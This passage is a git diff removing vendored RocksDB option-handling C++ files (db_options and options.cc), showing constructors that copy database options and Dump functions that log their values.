-      db_log_dir(options.db_log_dir),
-      wal_dir(options.wal_dir),
-      max_subcompactions(options.max_subcompactions),
-      max_background_flushes(options.max_background_flushes),
-      max_log_file_size(options.max_log_file_size),
-      log_file_time_to_roll(options.log_file_time_to_roll),
-      keep_log_file_num(options.keep_log_file_num),
-      recycle_log_file_num(options.recycle_log_file_num),
-      max_manifest_file_size(options.max_manifest_file_size),
-      table_cache_numshardbits(options.table_cache_numshardbits),
-      wal_ttl_seconds(options.WAL_ttl_seconds),
-      wal_size_limit_mb(options.WAL_size_limit_MB),
-      manifest_preallocation_size(options.manifest_preallocation_size),
-      allow_mmap_reads(options.allow_mmap_reads),
-      allow_mmap_writes(options.allow_mmap_writes),
-      use_direct_reads(options.use_direct_reads),
-      use_direct_io_for_flush_and_compaction(
-          options.use_direct_io_for_flush_and_compaction),
-      allow_fallocate(options.allow_fallocate),
-      is_fd_close_on_exec(options.is_fd_close_on_exec),
-      advise_random_on_open(options.advise_random_on_open),
-      db_write_buffer_size(options.db_write_buffer_size),
-      write_buffer_manager(options.write_buffer_manager),
-      access_hint_on_compaction_start(options.access_hint_on_compaction_start),
-      new_table_reader_for_compaction_inputs(
-          options.new_table_reader_for_compaction_inputs),
-      compaction_readahead_size(options.compaction_readahead_size),
-      random_access_max_buffer_size(options.random_access_max_buffer_size),
-      writable_file_max_buffer_size(options.writable_file_max_buffer_size),
-      use_adaptive_mutex(options.use_adaptive_mutex),
-      bytes_per_sync(options.bytes_per_sync),
-      wal_bytes_per_sync(options.wal_bytes_per_sync),
-      listeners(options.listeners),
-      enable_thread_tracking(options.enable_thread_tracking),
-      enable_pipelined_write(options.enable_pipelined_write),
-      allow_concurrent_memtable_write(options.allow_concurrent_memtable_write),
-      enable_write_thread_adaptive_yield(
-          options.enable_write_thread_adaptive_yield),
-      write_thread_max_yield_usec(options.write_thread_max_yield_usec),
-      write_thread_slow_yield_usec(options.write_thread_slow_yield_usec),
-      skip_stats_update_on_db_open(options.skip_stats_update_on_db_open),
-      wal_recovery_mode(options.wal_recovery_mode),
-      allow_2pc(options.allow_2pc),
-      row_cache(options.row_cache),
-#ifndef ROCKSDB_LITE
-      wal_filter(options.wal_filter),
-#endif  // ROCKSDB_LITE
-      fail_if_options_file_error(options.fail_if_options_file_error),
-      dump_malloc_stats(options.dump_malloc_stats),
-      avoid_flush_during_recovery(options.avoid_flush_during_recovery),
-      allow_ingest_behind(options.allow_ingest_behind),
-      concurrent_prepare(options.concurrent_prepare),
-      manual_wal_flush(options.manual_wal_flush) {
-}
-
-void ImmutableDBOptions::Dump(Logger* log) const {
-  ROCKS_LOG_HEADER(log, "                        Options.error_if_exists: %d",
-                   error_if_exists);
-  ROCKS_LOG_HEADER(log, "                      Options.create_if_missing: %d",
-                   create_if_missing);
-  ROCKS_LOG_HEADER(log, "                        Options.paranoid_checks: %d",
-                   paranoid_checks);
-  ROCKS_LOG_HEADER(log, "                                    Options.env: %p",
-                   env);
-  ROCKS_LOG_HEADER(log, "                               Options.info_log: %p",
-                   info_log.get());
-  ROCKS_LOG_HEADER(log, "               Options.max_file_opening_threads: %d",
-                   max_file_opening_threads);
-  ROCKS_LOG_HEADER(log, "                              Options.use_fsync: %d",
-                   use_fsync);
-  ROCKS_LOG_HEADER(
-      log, "                      Options.max_log_file_size: %" ROCKSDB_PRIszt,
-      max_log_file_size);
-  ROCKS_LOG_HEADER(log,
-                   "                 Options.max_manifest_file_size: %" PRIu64,
-                   max_manifest_file_size);
-  ROCKS_LOG_HEADER(
-      log, "                  Options.log_file_time_to_roll: %" ROCKSDB_PRIszt,
-      log_file_time_to_roll);
-  ROCKS_LOG_HEADER(
-      log, "                      Options.keep_log_file_num: %" ROCKSDB_PRIszt,
-      keep_log_file_num);
-  ROCKS_LOG_HEADER(
-      log, "                   Options.recycle_log_file_num: %" ROCKSDB_PRIszt,
-      recycle_log_file_num);
-  ROCKS_LOG_HEADER(log, "                        Options.allow_fallocate: %d",
-                   allow_fallocate);
-  ROCKS_LOG_HEADER(log, "                       Options.allow_mmap_reads: %d",
-                   allow_mmap_reads);
-  ROCKS_LOG_HEADER(log, "                      Options.allow_mmap_writes: %d",
-                   allow_mmap_writes);
-  ROCKS_LOG_HEADER(log, "                       Options.use_direct_reads: %d",
-                   use_direct_reads);
-  ROCKS_LOG_HEADER(log,
-                   "                       "
-                   "Options.use_direct_io_for_flush_and_compaction: %d",
-                   use_direct_io_for_flush_and_compaction);
-  ROCKS_LOG_HEADER(log, "         Options.create_missing_column_families: %d",
-                   create_missing_column_families);
-  ROCKS_LOG_HEADER(log, "                             Options.db_log_dir: %s",
-                   db_log_dir.c_str());
-  ROCKS_LOG_HEADER(log, "                                Options.wal_dir: %s",
-                   wal_dir.c_str());
-  ROCKS_LOG_HEADER(log, "               Options.table_cache_numshardbits: %d",
-                   table_cache_numshardbits);
-  ROCKS_LOG_HEADER(log,
-                   "                     Options.max_subcompactions: %" PRIu32,
-                   max_subcompactions);
-  ROCKS_LOG_HEADER(log, "                 Options.max_background_flushes: %d",
-                   max_background_flushes);
-  ROCKS_LOG_HEADER(log,
-                   "                        Options.WAL_ttl_seconds: %" PRIu64,
-                   wal_ttl_seconds);
-  ROCKS_LOG_HEADER(log,
-                   "                      Options.WAL_size_limit_MB: %" PRIu64,
-                   wal_size_limit_mb);
-  ROCKS_LOG_HEADER(
-      log, "            Options.manifest_preallocation_size: %" ROCKSDB_PRIszt,
-      manifest_preallocation_size);
-  ROCKS_LOG_HEADER(log, "                    Options.is_fd_close_on_exec: %d",
-                   is_fd_close_on_exec);
-  ROCKS_LOG_HEADER(log, "                  Options.advise_random_on_open: %d",
-                   advise_random_on_open);
-  ROCKS_LOG_HEADER(
-      log, "                   Options.db_write_buffer_size: %" ROCKSDB_PRIszt,
-      db_write_buffer_size);
-  ROCKS_LOG_HEADER(log, "                   Options.write_buffer_manager: %p",
-                   write_buffer_manager.get());
-  ROCKS_LOG_HEADER(log, "        Options.access_hint_on_compaction_start: %d",
-                   static_cast<int>(access_hint_on_compaction_start));
-  ROCKS_LOG_HEADER(log, " Options.new_table_reader_for_compaction_inputs: %d",
-                   new_table_reader_for_compaction_inputs);
-  ROCKS_LOG_HEADER(
-      log, "              Options.compaction_readahead_size: %" ROCKSDB_PRIszt,
-      compaction_readahead_size);
-  ROCKS_LOG_HEADER(
-      log, "          Options.random_access_max_buffer_size: %" ROCKSDB_PRIszt,
-      random_access_max_buffer_size);
-  ROCKS_LOG_HEADER(
-      log, "          Options.writable_file_max_buffer_size: %" ROCKSDB_PRIszt,
-      writable_file_max_buffer_size);
-  ROCKS_LOG_HEADER(log, "                     Options.use_adaptive_mutex: %d",
-                   use_adaptive_mutex);
-  ROCKS_LOG_HEADER(log, "                           Options.rate_limiter: %p",
-                   rate_limiter.get());
-  Header(
-      log, "    Options.sst_file_manager.rate_bytes_per_sec: %" PRIi64,
-      sst_file_manager ? sst_file_manager->GetDeleteRateBytesPerSecond() : 0);
-  ROCKS_LOG_HEADER(log,
-                   "                         Options.bytes_per_sync: %" PRIu64,
-                   bytes_per_sync);
-  ROCKS_LOG_HEADER(log,
-                   "                     Options.wal_bytes_per_sync: %" PRIu64,
-                   wal_bytes_per_sync);
-  ROCKS_LOG_HEADER(log, "                      Options.wal_recovery_mode: %d",
-                   wal_recovery_mode);
-  ROCKS_LOG_HEADER(log, "                 Options.enable_thread_tracking: %d",
-                   enable_thread_tracking);
-  ROCKS_LOG_HEADER(log, "                 Options.enable_pipelined_write: %d",
-                   enable_pipelined_write);
-  ROCKS_LOG_HEADER(log, "        Options.allow_concurrent_memtable_write: %d",
-                   allow_concurrent_memtable_write);
-  ROCKS_LOG_HEADER(log, "     Options.enable_write_thread_adaptive_yield: %d",
-                   enable_write_thread_adaptive_yield);
-  ROCKS_LOG_HEADER(log,
-                   "            Options.write_thread_max_yield_usec: %" PRIu64,
-                   write_thread_max_yield_usec);
-  ROCKS_LOG_HEADER(log,
-                   "           Options.write_thread_slow_yield_usec: %" PRIu64,
-                   write_thread_slow_yield_usec);
-  if (row_cache) {
-    ROCKS_LOG_HEADER(
-        log, "                              Options.row_cache: %" PRIu64,
-        row_cache->GetCapacity());
-  } else {
-    ROCKS_LOG_HEADER(log,
-                     "                              Options.row_cache: None");
-  }
-#ifndef ROCKSDB_LITE
-  ROCKS_LOG_HEADER(log, "                             Options.wal_filter: %s",
-                   wal_filter ? wal_filter->Name() : "None");
-#endif  // ROCKDB_LITE
-
-  ROCKS_LOG_HEADER(log, "            Options.avoid_flush_during_recovery: %d",
-                   avoid_flush_during_recovery);
-  ROCKS_LOG_HEADER(log, "            Options.allow_ingest_behind: %d",
-                   allow_ingest_behind);
-  ROCKS_LOG_HEADER(log, "            Options.concurrent_prepare: %d",
-                   concurrent_prepare);
-  ROCKS_LOG_HEADER(log, "            Options.manual_wal_flush: %d",
-                   manual_wal_flush);
-}
-
-MutableDBOptions::MutableDBOptions()
-    : max_background_jobs(2),
-      base_background_compactions(-1),
-      max_background_compactions(-1),
-      avoid_flush_during_shutdown(false),
-      delayed_write_rate(2 * 1024U * 1024U),
-      max_total_wal_size(0),
-      delete_obsolete_files_period_micros(6ULL * 60 * 60 * 1000000),
-      stats_dump_period_sec(600),
-      max_open_files(-1) {}
-
-MutableDBOptions::MutableDBOptions(const DBOptions& options)
-    : max_background_jobs(options.max_background_jobs),
-      base_background_compactions(options.base_background_compactions),
-      max_background_compactions(options.max_background_compactions),
-      avoid_flush_during_shutdown(options.avoid_flush_during_shutdown),
-      delayed_write_rate(options.delayed_write_rate),
-      max_total_wal_size(options.max_total_wal_size),
-      delete_obsolete_files_period_micros(
-          options.delete_obsolete_files_period_micros),
-      stats_dump_period_sec(options.stats_dump_period_sec),
-      max_open_files(options.max_open_files) {}
-
-void MutableDBOptions::Dump(Logger* log) const {
-  ROCKS_LOG_HEADER(log, "            Options.max_background_jobs: %d",
-                   max_background_jobs);
-  ROCKS_LOG_HEADER(log, "            Options.max_background_compactions: %d",
-                   max_background_compactions);
-  ROCKS_LOG_HEADER(log, "            Options.avoid_flush_during_shutdown: %d",
-                   avoid_flush_during_shutdown);
-  ROCKS_LOG_HEADER(log, "            Options.delayed_write_rate : %" PRIu64,
-                   delayed_write_rate);
-  ROCKS_LOG_HEADER(log, "            Options.max_total_wal_size: %" PRIu64,
-                   max_total_wal_size);
-  ROCKS_LOG_HEADER(
-      log, "            Options.delete_obsolete_files_period_micros: %" PRIu64,
-      delete_obsolete_files_period_micros);
-  ROCKS_LOG_HEADER(log, "                  Options.stats_dump_period_sec: %u",
-                   stats_dump_period_sec);
-  ROCKS_LOG_HEADER(log, "                         Options.max_open_files: %d",
-                   max_open_files);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/options/db_options.h b/thirdparty/rocksdb/options/db_options.h
deleted file mode 100644
index 18d1a5f..0000000
--- a/thirdparty/rocksdb/options/db_options.h
+++ /dev/null
@@ -1,104 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <string>
-#include <vector>
-
-#include "rocksdb/options.h"
-
-namespace rocksdb {
-
-struct ImmutableDBOptions {
-  ImmutableDBOptions();
-  explicit ImmutableDBOptions(const DBOptions& options);
-
-  void Dump(Logger* log) const;
-
-  bool create_if_missing;
-  bool create_missing_column_families;
-  bool error_if_exists;
-  bool paranoid_checks;
-  Env* env;
-  std::shared_ptr<RateLimiter> rate_limiter;
-  std::shared_ptr<SstFileManager> sst_file_manager;
-  std::shared_ptr<Logger> info_log;
-  InfoLogLevel info_log_level;
-  int max_file_opening_threads;
-  std::shared_ptr<Statistics> statistics;
-  bool use_fsync;
-  std::vector<DbPath> db_paths;
-  std::string db_log_dir;
-  std::string wal_dir;
-  uint32_t max_subcompactions;
-  int max_background_flushes;
-  size_t max_log_file_size;
-  size_t log_file_time_to_roll;
-  size_t keep_log_file_num;
-  size_t recycle_log_file_num;
-  uint64_t max_manifest_file_size;
-  int table_cache_numshardbits;
-  uint64_t wal_ttl_seconds;
-  uint64_t wal_size_limit_mb;
-  size_t manifest_preallocation_size;
-  bool allow_mmap_reads;
-  bool allow_mmap_writes;
-  bool use_direct_reads;
-  bool use_direct_io_for_flush_and_compaction;
-  bool allow_fallocate;
-  bool is_fd_close_on_exec;
-  bool advise_random_on_open;
-  size_t db_write_buffer_size;
-  std::shared_ptr<WriteBufferManager> write_buffer_manager;
-  DBOptions::AccessHint access_hint_on_compaction_start;
-  bool new_table_reader_for_compaction_inputs;
-  size_t compaction_readahead_size;
-  size_t random_access_max_buffer_size;
-  size_t writable_file_max_buffer_size;
-  bool use_adaptive_mutex;
-  uint64_t bytes_per_sync;
-  uint64_t wal_bytes_per_sync;
-  std::vector<std::shared_ptr<EventListener>> listeners;
-  bool enable_thread_tracking;
-  bool enable_pipelined_write;
-  bool allow_concurrent_memtable_write;
-  bool enable_write_thread_adaptive_yield;
-  uint64_t write_thread_max_yield_usec;
-  uint64_t write_thread_slow_yield_usec;
-  bool skip_stats_update_on_db_open;
-  WALRecoveryMode wal_recovery_mode;
-  bool allow_2pc;
-  std::shared_ptr<Cache> row_cache;
-#ifndef ROCKSDB_LITE
-  WalFilter* wal_filter;
-#endif  // ROCKSDB_LITE
-  bool fail_if_options_file_error;
-  bool dump_malloc_stats;
-  bool avoid_flush_during_recovery;
-  bool allow_ingest_behind;
-  bool concurrent_prepare;
-  bool manual_wal_flush;
-};
-
-struct MutableDBOptions {
-  MutableDBOptions();
-  explicit MutableDBOptions(const MutableDBOptions& options) = default;
-  explicit MutableDBOptions(const DBOptions& options);
-
-  void Dump(Logger* log) const;
-
-  int max_background_jobs;
-  int base_background_compactions;
-  int max_background_compactions;
-  bool avoid_flush_during_shutdown;
-  uint64_t delayed_write_rate;
-  uint64_t max_total_wal_size;
-  uint64_t delete_obsolete_files_period_micros;
-  unsigned int stats_dump_period_sec;
-  int max_open_files;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/options/options.cc b/thirdparty/rocksdb/options/options.cc
deleted file mode 100644
index 7bd2c95..0000000
--- a/thirdparty/rocksdb/options/options.cc
+++ /dev/null
@@ -1,636 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/options.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <limits>
-
-#include "monitoring/statistics.h"
-#include "options/db_options.h"
-#include "options/options_helper.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/sst_file_manager.h"
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-#include "rocksdb/wal_filter.h"
-#include "table/block_based_table_factory.h"
-#include "util/compression.h"
-
-namespace rocksdb {
-
-AdvancedColumnFamilyOptions::AdvancedColumnFamilyOptions() {
-  assert(memtable_factory.get() != nullptr);
-}
-
-AdvancedColumnFamilyOptions::AdvancedColumnFamilyOptions(const Options& options)
-    : max_write_buffer_number(options.max_write_buffer_number),
-      min_write_buffer_number_to_merge(
-          options.min_write_buffer_number_to_merge),
-      max_write_buffer_number_to_maintain(
-          options.max_write_buffer_number_to_maintain),
-      inplace_update_support(options.inplace_update_support),
-      inplace_update_num_locks(options.inplace_update_num_locks),
-      inplace_callback(options.inplace_callback),
-      memtable_prefix_bloom_size_ratio(
-          options.memtable_prefix_bloom_size_ratio),
-      memtable_huge_page_size(options.memtable_huge_page_size),
-      memtable_insert_with_hint_prefix_extractor(
-          options.memtable_insert_with_hint_prefix_extractor),
-      bloom_locality(options.bloom_locality),
-      arena_block_size(options.arena_block_size),
-      compression_per_level(options.compression_per_level),
-      num_levels(options.num_levels),
-      level0_slowdown_writes_trigger(options.level0_slowdown_writes_trigger),
-      level0_stop_writes_trigger(options.level0_stop_writes_trigger),
-      target_file_size_base(options.target_file_size_base),
-      target_file_size_multiplier(options.target_file_size_multiplier),
-      level_compaction_dynamic_level_bytes(
-          options.level_compaction_dynamic_level_bytes),
-      max_bytes_for_level_multiplier(options.max_bytes_for_level_multiplier),
-      max_bytes_for_level_multiplier_additional(
-          options.max_bytes_for_level_multiplier_additional),
-      max_compaction_bytes(options.max_compaction_bytes),
-      soft_pending_compaction_bytes_limit(
-          options.soft_pending_compaction_bytes_limit),
-      hard_pending_compaction_bytes_limit(
-          options.hard_pending_compaction_bytes_limit),
-      compaction_style(options.compaction_style),
-      compaction_pri(options.compaction_pri),
-      compaction_options_universal(options.compaction_options_universal),
-      compaction_options_fifo(options.compaction_options_fifo),
-      max_sequential_skip_in_iterations(
-          options.max_sequential_skip_in_iterations),
-      memtable_factory(options.memtable_factory),
-      table_properties_collector_factories(
-          options.table_properties_collector_factories),
-      max_successive_merges(options.max_successive_merges),
-      optimize_filters_for_hits(options.optimize_filters_for_hits),
-      paranoid_file_checks(options.paranoid_file_checks),
-      force_consistency_checks(options.force_consistency_checks),
-      report_bg_io_stats(options.report_bg_io_stats) {
-  assert(memtable_factory.get() != nullptr);
-  if (max_bytes_for_level_multiplier_additional.size() <
-      static_cast<unsigned int>(num_levels)) {
-    max_bytes_for_level_multiplier_additional.resize(num_levels, 1);
-  }
-}
-
-ColumnFamilyOptions::ColumnFamilyOptions()
-    : compression(Snappy_Supported() ? kSnappyCompression : kNoCompression),
-      table_factory(
-          std::shared_ptr<TableFactory>(new BlockBasedTableFactory())) {}
-
-ColumnFamilyOptions::ColumnFamilyOptions(const Options& options)
-    : AdvancedColumnFamilyOptions(options),
-      comparator(options.comparator),
-      merge_operator(options.merge_operator),
-      compaction_filter(options.compaction_filter),
-      compaction_filter_factory(options.compaction_filter_factory),
-      write_buffer_size(options.write_buffer_size),
-      compression(options.compression),
-      bottommost_compression(options.bottommost_compression),
-      compression_opts(options.compression_opts),
-      level0_file_num_compaction_trigger(
-          options.level0_file_num_compaction_trigger),
-      prefix_extractor(options.prefix_extractor),
-      max_bytes_for_level_base(options.max_bytes_for_level_base),
-      disable_auto_compactions(options.disable_auto_compactions),
-      table_factory(options.table_factory) {}
-
-DBOptions::DBOptions() {}
-
-DBOptions::DBOptions(const Options& options)
-    : create_if_missing(options.create_if_missing),
-      create_missing_column_families(options.create_missing_column_families),
-      error_if_exists(options.error_if_exists),
-      paranoid_checks(options.paranoid_checks),
-      env(options.env),
-      rate_limiter(options.rate_limiter),
-      sst_file_manager(options.sst_file_manager),
-      info_log(options.info_log),
-      info_log_level(options.info_log_level),
-      max_open_files(options.max_open_files),
-      max_file_opening_threads(options.max_file_opening_threads),
-      max_total_wal_size(options.max_total_wal_size),
-      statistics(options.statistics),
-      use_fsync(options.use_fsync),
-      db_paths(options.db_paths),
-      db_log_dir(options.db_log_dir),
-      wal_dir(options.wal_dir),
-      delete_obsolete_files_period_micros(
-          options.delete_obsolete_files_period_micros),
-      max_background_jobs(options.max_background_jobs),
-      base_background_compactions(options.base_background_compactions),
-      max_background_compactions(options.max_background_compactions),
-      max_subcompactions(options.max_subcompactions),
-      max_background_flushes(options.max_background_flushes),
-      max_log_file_size(options.max_log_file_size),
-      log_file_time_to_roll(options.log_file_time_to_roll),
-      keep_log_file_num(options.keep_log_file_num),
-      recycle_log_file_num(options.recycle_log_file_num),
-      max_manifest_file_size(options.max_manifest_file_size),
-      table_cache_numshardbits(options.table_cache_numshardbits),
-      WAL_ttl_seconds(options.WAL_ttl_seconds),
-      WAL_size_limit_MB(options.WAL_size_limit_MB),
-      manifest_preallocation_size(options.manifest_preallocation_size),
-      allow_mmap_reads(options.allow_mmap_reads),
-      allow_mmap_writes(options.allow_mmap_writes),
-      use_direct_reads(options.use_direct_reads),
-      use_direct_io_for_flush_and_compaction(
-          options.use_direct_io_for_flush_and_compaction),
-      allow_fallocate(options.allow_fallocate),
-      is_fd_close_on_exec(options.is_fd_close_on_exec),
-      skip_log_error_on_recovery(options.skip_log_error_on_recovery),
-      stats_dump_period_sec(options.stats_dump_period_sec),
-      advise_random_on_open(options.advise_random_on_open),
-      db_write_buffer_size(options.db_write_buffer_size),
-      write_buffer_manager(options.write_buffer_manager),
-      access_hint_on_compaction_start(options.access_hint_on_compaction_start),
-      new_table_reader_for_compaction_inputs(
-          options.new_table_reader_for_compaction_inputs),
-      compaction_readahead_size(options.compaction_readahead_size),
-      random_access_max_buffer_size(options.random_access_max_buffer_size),
-      writable_file_max_buffer_size(options.writable_file_max_buffer_size),
-      use_adaptive_mutex(options.use_adaptive_mutex),
-      bytes_per_sync(options.bytes_per_sync),
-      wal_bytes_per_sync(options.wal_bytes_per_sync),
-      listeners(options.listeners),
-      enable_thread_tracking(options.enable_thread_tracking),
-      delayed_write_rate(options.delayed_write_rate),
-      enable_pipelined_write(options.enable_pipelined_write),
-      allow_concurrent_memtable_write(options.allow_concurrent_memtable_write),
-      enable_write_thread_adaptive_yield(
-          options.enable_write_thread_adaptive_yield),
-      write_thread_max_yield_usec(options.write_thread_max_yield_usec),
-      write_thread_slow_yield_usec(options.write_thread_slow_yield_usec),
-      skip_stats_update_on_db_open(options.skip_stats_update_on_db_open),
-      wal_recovery_mode(options.wal_recovery_mode),
-      row_cache(options.row_cache),
-#ifndef ROCKSDB_LITE
-      wal_filter(options.wal_filter),
-#endif  // ROCKSDB_LITE
-      fail_if_options_file_error(options.fail_if_options_file_error),
-      dump_malloc_stats(options.dump_malloc_stats),
-      avoid_flush_during_recovery(options.avoid_flush_during_recovery),
-      avoid_flush_during_shutdown(options.avoid_flush_during_shutdown),
-      allow_ingest_behind(options.allow_ingest_behind) {
-}
-
-void DBOptions::Dump(Logger* log) const {
-    ImmutableDBOptions(*this).Dump(log);
-    MutableDBOptions(*this).Dump(log);
-}  // DBOptions::Dump
-
-void ColumnFamilyOptions::Dump(Logger* log) const {
-  ROCKS_LOG_HEADER(log, "              Options.comparator: %s",
-                   comparator->Name());
-  ROCKS_LOG_HEADER(log, "          Options.merge_operator: %s",
-                   merge_operator ? merge_operator->Name() : "None");
-  ROCKS_LOG_HEADER(log, "       Options.compaction_filter: %s",
-                   compaction_filter ? compaction_filter->Name() : "None");
-  ROCKS_LOG_HEADER(
-      log, "       Options.compaction_filter_factory: %s",
-      compaction_filter_factory ? compaction_filter_factory->Name() : "None");
-  ROCKS_LOG_HEADER(log, "        Options.memtable_factory: %s",
-                   memtable_factory->Name());
-  ROCKS_LOG_HEADER(log, "           Options.table_factory: %s",
-                   table_factory->Name());
-  ROCKS_LOG_HEADER(log, "           table_factory options: %s",
-                   table_factory->GetPrintableTableOptions().c_str());
-  ROCKS_LOG_HEADER(log, "       Options.write_buffer_size: %" ROCKSDB_PRIszt,
-                   write_buffer_size);
-  ROCKS_LOG_HEADER(log, " Options.max_write_buffer_number: %d",
-                   max_write_buffer_number);
-  if (!compression_per_level.empty()) {
-    for (unsigned int i = 0; i < compression_per_level.size(); i++) {
-      ROCKS_LOG_HEADER(
-          log, "       Options.compression[%d]: %s", i,
-          CompressionTypeToString(compression_per_level[i]).c_str());
-    }
-    } else {
-      ROCKS_LOG_HEADER(log, "         Options.compression: %s",
-                       CompressionTypeToString(compression).c_str());
-    }
-    ROCKS_LOG_HEADER(
-        log, "                 Options.bottommost_compression: %s",
-        bottommost_compression == kDisableCompressionOption
-            ? "Disabled"
-            : CompressionTypeToString(bottommost_compression).c_str());
-    ROCKS_LOG_HEADER(
-        log, "      Options.prefix_extractor: %s",
-        prefix_extractor == nullptr ? "nullptr" : prefix_extractor->Name());
-    ROCKS_LOG_HEADER(log,
-                     "  Options.memtable_insert_with_hint_prefix_extractor: %s",
-                     memtable_insert_with_hint_prefix_extractor == nullptr
-                         ? "nullptr"
-                         : memtable_insert_with_hint_prefix_extractor->Name());
-    ROCKS_LOG_HEADER(log, "            Options.num_levels: %d", num_levels);
-    ROCKS_LOG_HEADER(log, "       Options.min_write_buffer_number_to_merge: %d",
-                     min_write_buffer_number_to_merge);
-    ROCKS_LOG_HEADER(log, "    Options.max_write_buffer_number_to_maintain: %d",
-                     max_write_buffer_number_to_maintain);
-    ROCKS_LOG_HEADER(log, "           Options.compression_opts.window_bits: %d",
-                     compression_opts.window_bits);
-    ROCKS_LOG_HEADER(log, "                 Options.compression_opts.level: %d",
-                     compression_opts.level);
-    ROCKS_LOG_HEADER(log, "              Options.compression_opts.strategy: %d",
-                     compression_opts.strategy);
-    ROCKS_LOG_HEADER(
-        log,
-        "        Options.compression_opts.max_dict_bytes: %" ROCKSDB_PRIszt,
-        compression_opts.max_dict_bytes);
-    ROCKS_LOG_HEADER(log, "     Options.level0_file_num_compaction_trigger: %d",
-                     level0_file_num_compaction_trigger);
-    ROCKS_LOG_HEADER(log, "         Options.level0_slowdown_writes_trigger: %d",
-                     level0_slowdown_writes_trigger);
-    ROCKS_LOG_HEADER(log, "             Options.level0_stop_writes_trigger: %d",
-                     level0_stop_writes_trigger);
-    ROCKS_LOG_HEADER(
-        log, "                  Options.target_file_size_base: %" PRIu64,
-        target_file_size_base);
-    ROCKS_LOG_HEADER(log, "            Options.target_file_size_multiplier: %d",
-                     target_file_size_multiplier);
-    ROCKS_LOG_HEADER(
-        log, "               Options.max_bytes_for_level_base: %" PRIu64,
-        max_bytes_for_level_base);
-    ROCKS_LOG_HEADER(log, "Options.level_compaction_dynamic_level_bytes: %d",
-                     level_compaction_dynamic_level_bytes);
-    ROCKS_LOG_HEADER(log, "         Options.max_bytes_for_level_multiplier: %f",
-                     max_bytes_for_level_multiplier);
-    for (size_t i = 0; i < max_bytes_for_level_multiplier_additional.size();
-         i++) {
-      ROCKS_LOG_HEADER(
-          log, "Options.max_bytes_for_level_multiplier_addtl[%" ROCKSDB_PRIszt
-               "]: %d",
-          i, max_bytes_for_level_multiplier_additional[i]);
-    }
-    ROCKS_LOG_HEADER(
-        log, "      Options.max_sequential_skip_in_iterations: %" PRIu64,
-        max_sequential_skip_in_iterations);
-    ROCKS_LOG_HEADER(
-        log, "                   Options.max_compaction_bytes: %" PRIu64,
-        max_compaction_bytes);
-    ROCKS_LOG_HEADER(
-        log,
-        "                       Options.arena_block_size: %" ROCKSDB_PRIszt,
-        arena_block_size);
-    ROCKS_LOG_HEADER(log,
-                     "  Options.soft_pending_compaction_bytes_limit: %" PRIu64,
-                     soft_pending_compaction_bytes_limit);
-    ROCKS_LOG_HEADER(log,
-                     "  Options.hard_pending_compaction_bytes_limit: %" PRIu64,
-                     hard_pending_compaction_bytes_limit);
-    ROCKS_LOG_HEADER(log, "      Options.rate_limit_delay_max_milliseconds: %u",
-                     rate_limit_delay_max_milliseconds);
-    ROCKS_LOG_HEADER(log, "               Options.disable_auto_compactions: %d",
-                     disable_auto_compactions);
-
-    const auto& it_compaction_style =
-        compaction_style_to_string.find(compaction_style);
-    std::string str_compaction_style;
-    if (it_compaction_style == compaction_style_to_string.end()) {
-      assert(false);
-      str_compaction_style = "unknown_" + std::to_string(compaction_style);
-    } else {
-      str_compaction_style = it_compaction_style->second;
-    }
-    ROCKS_LOG_HEADER(log,
-                     "                       Options.compaction_style: %s",
-                     str_compaction_style.c_str());
-
-    const auto& it_compaction_pri =
-        compaction_pri_to_string.find(compaction_pri);
-    std::string str_compaction_pri;
-    if (it_compaction_pri == compaction_pri_to_string.end()) {
-      assert(false);
-      str_compaction_pri = "unknown_" + std::to_string(compaction_pri);
-    } else {
-      str_compaction_pri = it_compaction_pri->second;
-    }
-    ROCKS_LOG_HEADER(log,
-                     "                         Options.compaction_pri: %s",
-                     str_compaction_pri.c_str());
-    ROCKS_LOG_HEADER(log,
-                     "Options.compaction_options_universal.size_ratio: %u",
-                     compaction_options_universal.size_ratio);
-    ROCKS_LOG_HEADER(log,
-                     "Options.compaction_options_universal.min_merge_width: %u",
-                     compaction_options_universal.min_merge_width);
-    ROCKS_LOG_HEADER(log,
-                     "Options.compaction_options_universal.max_merge_width: %u",
-                     compaction_options_universal.max_merge_width);
-    ROCKS_LOG_HEADER(
-        log,
-        "Options.compaction_options_universal."
-        "max_size_amplification_percent: %u",
-        compaction_options_universal.max_size_amplification_percent);
-    ROCKS_LOG_HEADER(
-        log,
-        "Options.compaction_options_universal.compression_size_percent: %d",
-        compaction_options_universal.compression_size_percent);
-    const auto& it_compaction_stop_style = compaction_stop_style_to_string.find(
-        compaction_options_universal.stop_style);
-    std::string str_compaction_stop_style;
-    if (it_compaction_stop_style == compaction_stop_style_to_string.end()) {
-      assert(false);
-      str_compaction_stop_style =
-          "unknown_" + std::to_string(compaction_options_universal.stop_style);
-    } else {
-      str_compaction_stop_style = it_compaction_stop_style->second;
-    }
-    ROCKS_LOG_HEADER(log,
-                     "Options.compaction_options_universal.stop_style: %s",
-                     str_compaction_stop_style.c_str());
-    ROCKS_LOG_HEADER(
-        log, "Options.compaction_options_fifo.max_table_files_size: %" PRIu64,
-        compaction_options_fifo.max_table_files_size);
-    ROCKS_LOG_HEADER(log,
-                     "Options.compaction_options_fifo.allow_compaction: %d",
-                     compaction_options_fifo.allow_compaction);
-    ROCKS_LOG_HEADER(log, "Options.compaction_options_fifo.ttl: %" PRIu64,
